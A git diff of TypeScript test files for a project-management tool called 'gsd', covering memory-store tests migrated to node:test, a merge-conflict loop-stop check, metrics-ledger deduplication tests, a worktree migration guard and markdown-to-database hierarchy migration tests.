 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-store: processed unit tracking
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-store: processed unit tracking ===');
-{
+test('memory-store: processed unit tracking', () => {
   openDatabase(':memory:');
 
-  assertTrue(!isUnitProcessed('execute-task/M001/S01/T01'), 'should not be processed initially');
+  assert.ok(!isUnitProcessed('execute-task/M001/S01/T01'), 'should not be processed initially');
 
   markUnitProcessed('execute-task/M001/S01/T01', '/path/to/activity.jsonl');
 
-  assertTrue(isUnitProcessed('execute-task/M001/S01/T01'), 'should be processed after marking');
-  assertTrue(!isUnitProcessed('execute-task/M001/S01/T02'), 'different key should not be processed');
+  assert.ok(isUnitProcessed('execute-task/M001/S01/T01'), 'should be processed after marking');
+  assert.ok(!isUnitProcessed('execute-task/M001/S01/T02'), 'different key should not be processed');
 
   closeDatabase();
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-store: enforce memory cap
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-store: enforce memory cap ===');
-{
+test('memory-store: enforce memory cap', () => {
   openDatabase(':memory:');
 
   // Create 5 memories with varying confidence
@@ -194,23 +186,22 @@ console.log('\n=== memory-store: enforce memory cap ===');
   enforceMemoryCap(3);
 
   const active = getActiveMemories();
-  assertEq(active.length, 3, 'should have 3 active memories after cap enforcement');
+  assert.deepStrictEqual(active.length, 3, 'should have 3 active memories after cap enforcement');
 
   // The 2 lowest-ranked (MEM003=0.3 and MEM002=0.5) should be superseded
   const ids = active.map(m => m.id).sort();
-  assertTrue(ids.includes('MEM001'), 'MEM001 (0.9) should survive');
-  assertTrue(ids.includes('MEM004'), 'MEM004 (0.95) should survive');
-  assertTrue(ids.includes('MEM005'), 'MEM005 (0.7) should survive');
+  assert.ok(ids.includes('MEM001'), 'MEM001 (0.9) should survive');
+  assert.ok(ids.includes('MEM004'), 'MEM004 (0.95) should survive');
+  assert.ok(ids.includes('MEM005'), 'MEM005 (0.7) should survive');
 
   closeDatabase();
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-store: applyMemoryActions transaction
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-store: applyMemoryActions ===');
-{
+test('memory-store: applyMemoryActions', () => {
   openDatabase(':memory:');
 
   const actions: MemoryAction[] = [
@@ -221,7 +212,7 @@ console.log('\n=== memory-store: applyMemoryActions ===');
   applyMemoryActions(actions, 'execute-task', 'M001/S01/T01');
 
   let active = getActiveMemories();
-  assertEq(active.length, 2, 'should have 2 memories after CREATE actions');
+  assert.deepStrictEqual(active.length, 2, 'should have 2 memories after CREATE actions');
 
   // Now apply UPDATE + REINFORCE
   const updateActions: MemoryAction[] = [
@@ -232,8 +223,8 @@ console.log('\n=== memory-store: applyMemoryActions ===');
   applyMemoryActions(updateActions, 'execute-task', 'M001/S01/T02');
 
   active = getActiveMemories();
-  assertEq(active.find(m => m.id === 'MEM001')?.content, 'updated gotcha', 'MEM001 should be updated');
-  assertEq(active.find(m => m.id === 'MEM002')?.hit_count, 1, 'MEM002 should be reinforced');
+  assert.deepStrictEqual(active.find(m => m.id === 'MEM001')?.content, 'updated gotcha', 'MEM001 should be updated');
+  assert.deepStrictEqual(active.find(m => m.id === 'MEM002')?.hit_count, 1, 'MEM002 should be reinforced');
 
   // SUPERSEDE
   const supersedeActions: MemoryAction[] = [
@@ -244,19 +235,18 @@ console.log('\n=== memory-store: applyMemoryActions ===');
   applyMemoryActions(supersedeActions, 'execute-task', 'M001/S01/T03');
 
   active = getActiveMemories();
-  assertEq(active.length, 2, 'should have 2 active after supersede');
-  assertTrue(!active.find(m => m.id === 'MEM001'), 'MEM001 should be superseded');
-  assertTrue(!!active.find(m => m.id === 'MEM003'), 'MEM003 should be active');
+  assert.deepStrictEqual(active.length, 2, 'should have 2 active after supersede');
+  assert.ok(!active.find(m => m.id === 'MEM001'), 'MEM001 should be superseded');
+  assert.ok(!!active.find(m => m.id === 'MEM003'), 'MEM003 should be active');
 
   closeDatabase();
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-store: formatMemoriesForPrompt
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-store: formatMemoriesForPrompt ===');
-{
+test('memory-store: formatMemoriesForPrompt', () => {
   openDatabase(':memory:');
 
   createMemory({ category: 'gotcha', content: 'esbuild drops .node binaries' });
@@ -267,18 +257,18 @@ console.log('\n=== memory-store: formatMemoriesForPrompt ===');
   const memories = getActiveMemoriesRanked(30);
   const formatted = formatMemoriesForPrompt(memories);
 
-  assertTrue(formatted.includes('## Project Memory (auto-learned)'), 'should have header');
-  assertTrue(formatted.includes('### Gotcha'), 'should have gotcha category');
-  assertTrue(formatted.includes('### Convention'), 'should have convention category');
-  assertTrue(formatted.includes('### Architecture'), 'should have architecture category');
-  assertTrue(formatted.includes('- esbuild drops .node binaries'), 'should have gotcha content');
-  assertTrue(formatted.includes('- use :memory: for tests'), 'should have convention content');
+  assert.ok(formatted.includes('## Project Memory (auto-learned)'), 'should have header');
+  assert.ok(formatted.includes('### Gotcha'), 'should have gotcha category');
+  assert.ok(formatted.includes('### Convention'), 'should have convention category');
+  assert.ok(formatted.includes('### Architecture'), 'should have architecture category');
+  assert.ok(formatted.includes('- esbuild drops .node binaries'), 'should have gotcha content');
+  assert.ok(formatted.includes('- use :memory: for tests'), 'should have convention content');
 
   // Test empty memories
   closeDatabase();
   openDatabase(':memory:');
   const emptyFormatted = formatMemoriesForPrompt([]);
-  assertEq(emptyFormatted, '', 'empty memories should return empty string');
+  assert.deepStrictEqual(emptyFormatted, '', 'empty memories should return empty string');
 
   // Test token budget truncation
   closeDatabase();
@@ -288,58 +278,55 @@ console.log('\n=== memory-store: formatMemoriesForPrompt ===');
   }
   const budgetMemories = getActiveMemoriesRanked(30);
   const truncated = formatMemoriesForPrompt(budgetMemories, 500);
-  assertTrue(truncated.length < 2500, `formatted length ${truncated.length} should be under budget`);
+  assert.ok(truncated.length < 2500, `formatted length ${truncated.length} should be under budget`);
 
   closeDatabase();
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-store: ID generation
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-store: ID generation ===');
-{
+test('memory-store: ID generation', () => {
   openDatabase(':memory:');
 
-  assertEq(nextMemoryId(), 'MEM001', 'first ID should be MEM001');
+  assert.deepStrictEqual(nextMemoryId(), 'MEM001', 'first ID should be MEM001');
 
   createMemory({ category: 'test', content: 'test' });
-  assertEq(nextMemoryId(), 'MEM002', 'after first create, next should be MEM002');
+  assert.deepStrictEqual(nextMemoryId(), 'MEM002', 'after first create, next should be MEM002');
 
   // Create several more
   for (let i = 0; i < 98; i++) createMemory({ category: 'test', content: `test ${i}` });
-  assertEq(nextMemoryId(), 'MEM100', 'after 99 creates, next should be MEM100');
+  assert.deepStrictEqual(nextMemoryId(), 'MEM100', 'after 99 creates, next should be MEM100');
 
   closeDatabase();
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-store: schema migration (v2 → v3)
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-store: schema includes memories table ===');
-{
+test('memory-store: schema includes memories table', () => {
   openDatabase(':memory:');
 
   const adapter = _getAdapter()!;
 
   // Verify memories table exists
   const memCount = adapter.prepare('SELECT count(*) as cnt FROM memories').get();
-  assertEq(memCount?.['cnt'], 0, 'memories table should exist and be empty');
+  assert.deepStrictEqual(memCount?.['cnt'], 0, 'memories table should exist and be empty');
 
   // Verify memory_processed_units table exists
   const procCount = adapter.prepare('SELECT count(*) as cnt FROM memory_processed_units').get();
-  assertEq(procCount?.['cnt'], 0, 'memory_processed_units table should exist and be empty');
+  assert.deepStrictEqual(procCount?.['cnt'], 0, 'memory_processed_units table should exist and be empty');
 
   // Verify active_memories view exists
   const viewCount = adapter.prepare('SELECT count(*) as cnt FROM active_memories').get();
-  assertEq(viewCount?.['cnt'], 0, 'active_memories view should exist');
+  assert.deepStrictEqual(viewCount?.['cnt'], 0, 'active_memories view should exist');
 
-  // Verify schema version is 4
+  // Verify schema version is 14 (after indexes + slice_dependencies)
   const version = adapter.prepare('SELECT MAX(version) as v FROM schema_version').get();
-  assertEq(version?.['v'], 4, 'schema version should be 4');
+  assert.deepStrictEqual(version?.['v'], 14, 'schema version should be 14');
 
   closeDatabase();
-}
+});
 
-report();
diff --git a/src/resources/extensions/gsd/tests/merge-conflict-stops-loop.test.ts b/src/resources/extensions/gsd/tests/merge-conflict-stops-loop.test.ts
new file mode 100644
index 000000000..1b6450ee7
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/merge-conflict-stops-loop.test.ts
@@ -0,0 +1,66 @@
+/**
+ * merge-conflict-stops-loop.test.ts — #2330
+ *
+ * When a squash merge has real code conflicts (not just .gsd/ files),
+ * the merge retries forever because MergeConflictError is caught
+ * silently in mergeAndExit. This test verifies that:
+ * 1. worktree-resolver re-throws MergeConflictError for code conflicts
+ * 2. auto/phases.ts wraps mergeAndExit calls to stop the loop on conflict
+ */
+
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, report } = createTestContext();
+
+const resolverPath = join(import.meta.dirname, "..", "worktree-resolver.ts");
+const resolverSrc = readFileSync(resolverPath, "utf-8");
+
+const phasesPath = join(import.meta.dirname, "..", "auto", "phases.ts");
+const phasesSrc = readFileSync(phasesPath, "utf-8");
+
+console.log("\n=== #2330: Merge conflict stops auto loop ===");
+
+// ── Test 1: worktree-resolver re-throws MergeConflictError ──────────────
+
+const methodStart = resolverSrc.indexOf("Worktree-mode merge:");
+assertTrue(methodStart > 0, "worktree-resolver has _mergeWorktreeMode method");
+
+const methodBody = resolverSrc.slice(methodStart, methodStart + 6000);
+const rethrowsConflict =
+  methodBody.includes("MergeConflictError") &&
+  methodBody.includes("throw err");
+
+assertTrue(
+  rethrowsConflict,
+  "worktree-resolver._mergeWorktreeMode re-throws MergeConflictError (#2330)",
+);
+
+// ── Test 2: auto/phases.ts imports and uses MergeConflictError ──────────
+
+assertTrue(
+  phasesSrc.includes("MergeConflictError") && phasesSrc.includes("mergeAndExit"),
+  "auto/phases.ts handles MergeConflictError from mergeAndExit (#2330)",
+);
+
+// ── Test 3: The handler stops the loop (doesn't just warn) ──────────────
+
+// Find the instanceof MergeConflictError check (not the import line)
+const instanceofIdx = phasesSrc.indexOf("instanceof MergeConflictError");
+assertTrue(instanceofIdx > 0, "auto/phases.ts has instanceof MergeConflictError check");
+
+if (instanceofIdx > 0) {
+  const afterHandler = phasesSrc.slice(instanceofIdx, instanceofIdx + 500);
+  const stopsLoop =
+    afterHandler.includes("stopAuto") ||
+    afterHandler.includes('action: "break"') ||
+    afterHandler.includes("reason: \"merge-conflict\"");
+
+  assertTrue(
+    stopsLoop,
+    "auto/phases.ts stops the loop when merge conflict is detected (#2330)",
+  );
+}
+
+report();
diff --git a/src/resources/extensions/gsd/tests/metrics.test.ts b/src/resources/extensions/gsd/tests/metrics.test.ts
index 98782460e..dc221531a 100644
--- a/src/resources/extensions/gsd/tests/metrics.test.ts
+++ b/src/resources/extensions/gsd/tests/metrics.test.ts
@@ -6,7 +6,7 @@
 
 import test from "node:test";
 import assert from "node:assert/strict";
-import { mkdtempSync, mkdirSync, readFileSync, rmSync } from "node:fs";
+import { mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 import {
@@ -382,3 +382,118 @@ test("snapshotUnitMetrics counts toolCall blocks correctly (#1713)", () => {
     rmSync(tmpBase, { recursive: true, force: true });
   }
 });
+
+// ── #1943 — Duplicate metrics entries from idle watchdog ──────────────────────
+
+test("#1943 initMetrics deduplicates entries loaded from a corrupted disk ledger", () => {
+  const tmpBase = mkdtempSync(join(tmpdir(), "gsd-metrics-dedup-load-"));
+  mkdirSync(join(tmpBase, ".gsd"), { recursive: true });
+
+  try {
+    resetMetrics();
+
+    // Simulate a corrupted metrics.json with duplicate entries on disk
+    // (same type+id+startedAt but different finishedAt — idle watchdog pattern)
+    const corruptedLedger: MetricsLedger = {
+      version: 1,
+      projectStartedAt: 1700000000000,
+      units: [
+        makeUnit({ type: "research-slice", id: "M009/S02", startedAt: 1774011016218, finishedAt: 1774011031218, cost: 1.50, tokens: { input: 6600000, output: 100000, cacheRead: 0, cacheWrite: 0, total: 6700000 } }),
+        makeUnit({ type: "research-slice", id: "M009/S02", startedAt: 1774011016218, finishedAt: 1774011046218, cost: 1.55, tokens: { input: 6800000, output: 110000, cacheRead: 0, cacheWrite: 0, total: 6910000 } }),
+        makeUnit({ type: "research-slice", id: "M009/S02", startedAt: 1774011016218, finishedAt: 1774011061218, cost: 1.60, tokens: { input: 7000000, output: 120000, cacheRead: 0, cacheWrite: 0, total: 7120000 } }),
+        makeUnit({ type: "research-slice", id: "M009/S02", startedAt: 1774011016218, finishedAt: 1774011076218, cost: 1.65, tokens: { input: 7200000, output: 130000, cacheRead: 0, cacheWrite: 0, total: 7330000 } }),
+        // A different unit — should be preserved
+        makeUnit({ type: "execute-task", id: "M001/S01/T01", startedAt: 1774012000000, finishedAt: 1774012060000, cost: 0.50 }),
+      ],
+    };
+    writeFileSync(
+      join(tmpBase, ".gsd", "metrics.json"),
+      JSON.stringify(corruptedLedger, null, 2),
+    );
+
+    // Load the corrupted ledger — duplicates should be collapsed on load
+    initMetrics(tmpBase);
+    const ledger = getLedger();
+    assert.ok(ledger);
+
+    // The 4 entries with identical (type, id, startedAt) should collapse to 1,
+    // keeping the latest (highest finishedAt). Plus the 1 different unit = 2 total.
+    assert.equal(
+      ledger!.units.length, 2,
+      `expected 2 entries after dedup (1 collapsed group + 1 unique), got ${ledger!.units.length}`,
+    );
+
+    // The surviving duplicate should be the one with the latest finishedAt
+    const researchEntry = ledger!.units.find(u => u.type === "research-slice");
+    assert.ok(researchEntry);
+    assert.equal(researchEntry!.finishedAt, 1774011076218, "should keep the latest finishedAt");
+    assert.equal(researchEntry!.cost, 1.65, "should keep the latest cost");
+
+    // The on-disk file should also be deduplicated
+    const diskRaw = readFileSync(join(tmpBase, ".gsd", "metrics.json"), "utf-8");
+    const diskLedger: MetricsLedger = JSON.parse(diskRaw);
+    assert.equal(diskLedger.units.length, 2, "disk should also have deduplicated entries");
+  } finally {
+    resetMetrics();
+    rmSync(tmpBase, { recursive: true, force: true });
+  }
+});
+
+test("#1943 getProjectTotals reports correct cost after dedup (no 35% inflation)", () => {
+  // Simulate the exact scenario from the issue: 20 entries for a single dispatch
+  // with monotonically increasing token counts and 15s-apart finishedAt values
+  const startedAt = 1774011016218;
+  const baseCost = 1.50;
+  const duplicateUnits: UnitMetrics[] = [];
+
+  for (let i = 0; i < 20; i++) {
+    duplicateUnits.push(makeUnit({
+      type: "research-slice",
+      id: "M009/S02",
+      startedAt,
+      finishedAt: startedAt + (i + 1) * 15000,
+      cost: baseCost + i * 0.05,
+      toolCalls: 0,
+      tokens: {
+        input: 6600000 + i * 200000,
+        output: 100000 + i * 10000,
+        cacheRead: 0,
+        cacheWrite: 0,
+        total: 6700000 + i * 210000,
+      },
+    }));
+  }
+
+  // Without dedup, getProjectTotals would sum all 20 entries' costs
+  const rawTotals = getProjectTotals(duplicateUnits);
+  // With dedup (only last entry should count), cost should be the last entry's cost
+  const lastEntryCost = duplicateUnits[duplicateUnits.length - 1].cost;
+
+  // This test documents the bug: raw totals inflate cost by summing duplicates
+  assert.ok(
+    rawTotals.cost > lastEntryCost * 2,
+    "raw totals with duplicates inflate cost (bug demonstration)",
+  );
+
+  // After loading through initMetrics (which should dedup), totals should be correct
+  const tmpBase = mkdtempSync(join(tmpdir(), "gsd-metrics-cost-inflation-"));
+  mkdirSync(join(tmpBase, ".gsd"), { recursive: true });
+  try {
+    resetMetrics();
+    writeFileSync(
+      join(tmpBase, ".gsd", "metrics.json"),
+      JSON.stringify({ version: 1, projectStartedAt: 1700000000000, units: duplicateUnits }, null, 2),
+    );
+    initMetrics(tmpBase);
+    const ledger = getLedger()!;
+    const dedupedTotals = getProjectTotals(ledger.units);
+    assert.equal(ledger.units.length, 1, "20 duplicates should collapse to 1 entry");
+    assert.equal(
+      dedupedTotals.cost, lastEntryCost,
+      `deduped cost should be ${lastEntryCost}, not ${dedupedTotals.cost}`,
+    );
+  } finally {
+    resetMetrics();
+    rmSync(tmpBase, { recursive: true, force: true });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/migrate-external-worktree.test.ts b/src/resources/extensions/gsd/tests/migrate-external-worktree.test.ts
new file mode 100644
index 000000000..43098237b
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/migrate-external-worktree.test.ts
@@ -0,0 +1,105 @@
+import { describe, test, before, after } from "node:test";
+import assert from "node:assert/strict";
+import {
+  mkdtempSync,
+  rmSync,
+  writeFileSync,
+  existsSync,
+  mkdirSync,
+  realpathSync,
+} from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execSync } from "node:child_process";
+
+import { migrateToExternalState } from "../migrate-external.ts";
+
+function run(command: string, cwd: string): string {
+  return execSync(command, {
+    cwd,
+    stdio: ["ignore", "pipe", "pipe"],
+    encoding: "utf-8",
+  }).trim();
+}
+
+describe("migrate-external worktree guard (#2970)", () => {
+  let base: string;
+  let stateDir: string;
+  let worktreePath: string;
+
+  before(() => {
+    base = realpathSync(mkdtempSync(join(tmpdir(), "gsd-migrate-wt-")));
+    stateDir = realpathSync(mkdtempSync(join(tmpdir(), "gsd-state-")));
+    process.env.GSD_STATE_DIR = stateDir;
+
+    // Create a git repo with a remote
+    run("git init -b main", base);
+    run('git config user.name "Test"', base);
+    run('git config user.email "test@example.com"', base);
+    run('git remote add origin git@github.com:example/repo.git', base);
+    writeFileSync(join(base, "README.md"), "# Test\n", "utf-8");
+    run("git add README.md", base);
+    run('git commit -m "init"', base);
+
+    // Create a worktree
+    worktreePath = join(base, ".gsd", "worktrees", "M001");
+    run(`git worktree add -b milestone/M001 ${worktreePath}`, base);
+
+    // Populate worktree with a .gsd directory (simulating syncGsdStateToWorktree)
+    const worktreeGsd = join(worktreePath, ".gsd");
+    mkdirSync(worktreeGsd, { recursive: true });
+    writeFileSync(join(worktreeGsd, "PREFERENCES.md"), "# prefs\n", "utf-8");
+  });
+
+  after(() => {
+    delete process.env.GSD_STATE_DIR;
+    // Remove worktree before cleaning up
+    try { run(`git worktree remove --force ${worktreePath}`, base); } catch { /* ok */ }
+    rmSync(base, { recursive: true, force: true });
+    rmSync(stateDir, { recursive: true, force: true });
+  });
+
+  test("migrateToExternalState skips when basePath is a git worktree", () => {
+    // The worktree has a real .gsd directory — migration would normally run.
+    // But since this is a worktree, it should be skipped.
+    const result = migrateToExternalState(worktreePath);
+
+    assert.equal(result.migrated, false, "should not migrate inside a worktree");
+    assert.equal(result.error, undefined, "should not report an error");
+
+    // .gsd should still exist as a real directory (not renamed/removed)
+    assert.ok(
+      existsSync(join(worktreePath, ".gsd")),
+      ".gsd directory should still exist after skipped migration"
+    );
+
+    // .gsd.migrating should NOT exist
+    assert.ok(
+      !existsSync(join(worktreePath, ".gsd.migrating")),
+      ".gsd.migrating should not be created in a worktree"
+    );
+  });
+
+  test("migrateToExternalState still works on main repo", () => {
+    // Create a fresh temp repo to test main repo migration path
+    const mainBase = realpathSync(mkdtempSync(join(tmpdir(), "gsd-migrate-main-")));
+    try {
+      run("git init -b main", mainBase);
+      run('git config user.name "Test"', mainBase);
+      run('git config user.email "test@example.com"', mainBase);
+      run('git remote add origin git@github.com:example/main-repo.git', mainBase);
+      writeFileSync(join(mainBase, "README.md"), "# Test\n", "utf-8");
+      run("git add README.md", mainBase);
+      run('git commit -m "init"', mainBase);
+
+      // Create a .gsd directory with content
+      mkdirSync(join(mainBase, ".gsd"), { recursive: true });
+      writeFileSync(join(mainBase, ".gsd", "PREFERENCES.md"), "# prefs\n", "utf-8");
+
+      const result = migrateToExternalState(mainBase);
+      assert.equal(result.migrated, true, "should migrate on main repo");
+    } finally {
+      rmSync(mainBase, { recursive: true, force: true });
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/migrate-hierarchy.test.ts b/src/resources/extensions/gsd/tests/migrate-hierarchy.test.ts
new file mode 100644
index 000000000..27c8f74b8
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/migrate-hierarchy.test.ts
@@ -0,0 +1,429 @@
+// migrate-hierarchy.test.ts — Tests for migrateHierarchyToDb()
+// Verifies that the markdown → DB hierarchy migration populates
+// milestones, slices, and tasks tables correctly.
+
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import {
+  openDatabase,
+  closeDatabase,
+  getAllMilestones,
+  getMilestone,
+  getMilestoneSlices,
+  getSliceTasks,
+  getActiveMilestoneFromDb,
+  getActiveSliceFromDb,
+  getActiveTaskFromDb,
+} from '../gsd-db.ts';
+import { migrateHierarchyToDb } from '../md-importer.ts';
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+
+// ─── Fixture Helpers ───────────────────────────────────────────────────────
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-migrate-hier-'));
+  mkdirSync(join(base, '.gsd', 'milestones'), { recursive: true });
+  return base;
+}
+
+function writeFile(base: string, relativePath: string, content: string): void {
+  const full = join(base, '.gsd', relativePath);
+  mkdirSync(join(full, '..'), { recursive: true });
+  writeFileSync(full, content);
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+// ─── Fixture Content ──────────────────────────────────────────────────────
+
+const ROADMAP_2_SLICES = `# M001: Test Milestone
+
+**Vision:** Testing hierarchy migration.
+
+## Slices
+
+- [ ] **S01: First Slice** \`risk:low\` \`depends:[]\`
+  > After this: First slice done.
+
+- [ ] **S02: Second Slice** \`risk:high\` \`depends:[S01]\`
+  > After this: All slices done.
+`;
+
+const PLAN_S01_3_TASKS = `---
+estimated_steps: 3
+estimated_files: 2
+skills_used: []
+---
+
+# S01: First Slice
+
+**Goal:** Test tasks.
+**Demo:** Tasks pass.
+
+## Must-Haves
+
+- Task T01 works
+- Task T02 works
+
+## Tasks
+
+- [ ] **T01: First Task** \`est:30m\`
+  First task description.
+
+- [x] **T02: Second Task** \`est:15m\`
+  Already completed task.
+
+- [ ] **T03: Third Task** \`est:1h\`
+  Third task description.
+`;
+
+const PLAN_S02_1_TASK = `# S02: Second Slice
+
+**Goal:** Test second slice.
+**Demo:** S02 works.
+
+## Tasks
+
+- [ ] **T01: Only Task** \`est:20m\`
+  The only task in S02.
+`;
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Test Cases
+// ═══════════════════════════════════════════════════════════════════════════
+
+  // ─── Test (a): Single milestone with 2 slices, 3 tasks ────────────────
+
+test('migrate-hier: single milestone with 2 slices, 3 tasks', () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_2_SLICES);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_S01_3_TASKS);
+      writeFile(base, 'milestones/M001/slices/S02/S02-PLAN.md', PLAN_S02_1_TASK);
+
+      openDatabase(':memory:');
+      const counts = migrateHierarchyToDb(base);
+
+      assert.deepStrictEqual(counts.milestones, 1, 'single-ms: 1 milestone inserted');
+      assert.deepStrictEqual(counts.slices, 2, 'single-ms: 2 slices inserted');
+      assert.deepStrictEqual(counts.tasks, 4, 'single-ms: 4 tasks inserted (3 + 1)');
+
+      const milestones = getAllMilestones();
+      assert.deepStrictEqual(milestones.length, 1, 'single-ms: 1 milestone in DB');
+      assert.deepStrictEqual(milestones[0]!.id, 'M001', 'single-ms: milestone ID is M001');
+      assert.deepStrictEqual(milestones[0]!.title, 'M001: Test Milestone', 'single-ms: milestone title correct');
+      assert.deepStrictEqual(milestones[0]!.status, 'active', 'single-ms: milestone status is active');
+
+      const slices = getMilestoneSlices('M001');
+      assert.deepStrictEqual(slices.length, 2, 'single-ms: 2 slices in DB');
+      assert.deepStrictEqual(slices[0]!.id, 'S01', 'single-ms: first slice is S01');
+      assert.deepStrictEqual(slices[0]!.title, 'First Slice', 'single-ms: S01 title correct');
+      assert.deepStrictEqual(slices[0]!.risk, 'low', 'single-ms: S01 risk is low');
+      assert.deepStrictEqual(slices[0]!.status, 'pending', 'single-ms: S01 status is pending');
+      assert.deepStrictEqual(slices[1]!.id, 'S02', 'single-ms: second slice is S02');
+      assert.deepStrictEqual(slices[1]!.risk, 'high', 'single-ms: S02 risk is high');
+
+      const s01Tasks = getSliceTasks('M001', 'S01');
+      assert.deepStrictEqual(s01Tasks.length, 3, 'single-ms: 3 tasks for S01');
+      assert.deepStrictEqual(s01Tasks[0]!.id, 'T01', 'single-ms: first task is T01');
+      assert.deepStrictEqual(s01Tasks[0]!.title, 'First Task', 'single-ms: T01 title correct');
+      assert.deepStrictEqual(s01Tasks[0]!.status, 'pending', 'single-ms: T01 status is pending');
+      assert.deepStrictEqual(s01Tasks[1]!.id, 'T02', 'single-ms: second task is T02');
+      assert.deepStrictEqual(s01Tasks[1]!.status, 'complete', 'single-ms: T02 status is complete (was [x])');
+      assert.deepStrictEqual(s01Tasks[2]!.id, 'T03', 'single-ms: third task is T03');
+
+      const s02Tasks = getSliceTasks('M001', 'S02');
+      assert.deepStrictEqual(s02Tasks.length, 1, 'single-ms: 1 task for S02');
+      assert.deepStrictEqual(s02Tasks[0]!.id, 'T01', 'single-ms: S02 T01 correct');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+});
+
+  // ─── Test (b): Multi-milestone — M001 complete, M002 active with deps ─
+
+test('migrate-hier: multi-milestone with deps', () => {
+    const base = createFixtureBase();
+    try {
+      // M001: complete (has SUMMARY)
+      const m001Roadmap = `# M001: First Done
+
+**Vision:** Already completed.
+
+## Slices
+
+- [x] **S01: Done Slice** \`risk:low\` \`depends:[]\`
+  > After this: Done.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', m001Roadmap);
+      writeFile(base, 'milestones/M001/M001-SUMMARY.md', '# M001 Summary\n\nComplete.');
+
+      // M002: active with depends_on M001
+      const m002Context = `---
+depends_on:
+  - M001
+---
+
+# M002: Second Milestone
+
+Depends on M001 completion.
+`;
+      const m002Roadmap = `# M002: Second Milestone
+
+**Vision:** Active milestone.
+
+## Slices
+
+- [ ] **S01: Active Slice** \`risk:medium\` \`depends:[]\`
+  > After this: In progress.
+
+- [ ] **S02: Blocked Slice** \`risk:low\` \`depends:[S01]\`
+  > After this: Second done.
+`;
+      writeFile(base, 'milestones/M002/M002-CONTEXT.md', m002Context);
+      writeFile(base, 'milestones/M002/M002-ROADMAP.md', m002Roadmap);
+
+      openDatabase(':memory:');
+      const counts = migrateHierarchyToDb(base);
+
+      assert.deepStrictEqual(counts.milestones, 2, 'multi-ms: 2 milestones inserted');
+
+      const m001 = getMilestone('M001');
+      assert.ok(m001 !== null, 'multi-ms: M001 exists');
+      assert.deepStrictEqual(m001!.status, 'complete', 'multi-ms: M001 is complete');
+
+      const m002 = getMilestone('M002');
+      assert.ok(m002 !== null, 'multi-ms: M002 exists');
+      assert.deepStrictEqual(m002!.status, 'active', 'multi-ms: M002 is active');
+      assert.deepStrictEqual(m002!.depends_on, ['M001'], 'multi-ms: M002 depends on M001');
+
+      // Active milestone should be M002
+      const active = getActiveMilestoneFromDb();
+      assert.deepStrictEqual(active?.id, 'M002', 'multi-ms: active milestone is M002');
+
+      // Active slice in M002 should be S01 (S02 depends on S01)
+      const activeSlice = getActiveSliceFromDb('M002');
+      assert.deepStrictEqual(activeSlice?.id, 'S01', 'multi-ms: active slice is S01');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+});
+
+  // ─── Test (c): Partially-completed slice — some tasks [x], some [ ] ───
+
+test('migrate-hier: partially-completed slice', () => {
+    const base = createFixtureBase();
+    try {
+      const roadmap = `# M001: Partial
+
+**Vision:** Testing partial.
+
+## Slices
+
+- [ ] **S01: Mixed Slice** \`risk:low\` \`depends:[]\`
+  > After this: Partial.
+`;
+      const plan = `# S01: Mixed Slice
+
+**Goal:** Test partial.
+**Demo:** Partial.
+
+## Tasks
+
+- [x] **T01: Done** \`est:10m\`
+  Done task.
+
+- [x] **T02: Also Done** \`est:10m\`
+  Also done.
+
+- [ ] **T03: Not Done** \`est:10m\`
+  Still pending.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', roadmap);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', plan);
+
+      openDatabase(':memory:');
+      migrateHierarchyToDb(base);
+
+      const tasks = getSliceTasks('M001', 'S01');
+      assert.deepStrictEqual(tasks.length, 3, 'partial: 3 tasks');
+      assert.deepStrictEqual(tasks[0]!.status, 'complete', 'partial: T01 is complete');
+      assert.deepStrictEqual(tasks[1]!.status, 'complete', 'partial: T02 is complete');
+      assert.deepStrictEqual(tasks[2]!.status, 'pending', 'partial: T03 is pending');
+
+      // Active task should be T03
+      const activeTask = getActiveTaskFromDb('M001', 'S01');
+      assert.deepStrictEqual(activeTask?.id, 'T03', 'partial: active task is T03');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+});
+
+  // ─── Test (d): Ghost milestone skipped ────────────────────────────────
+
+test('migrate-hier: ghost milestone skipped', () => {
+    const base = createFixtureBase();
+    try {
+      // M001: real milestone
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_2_SLICES);
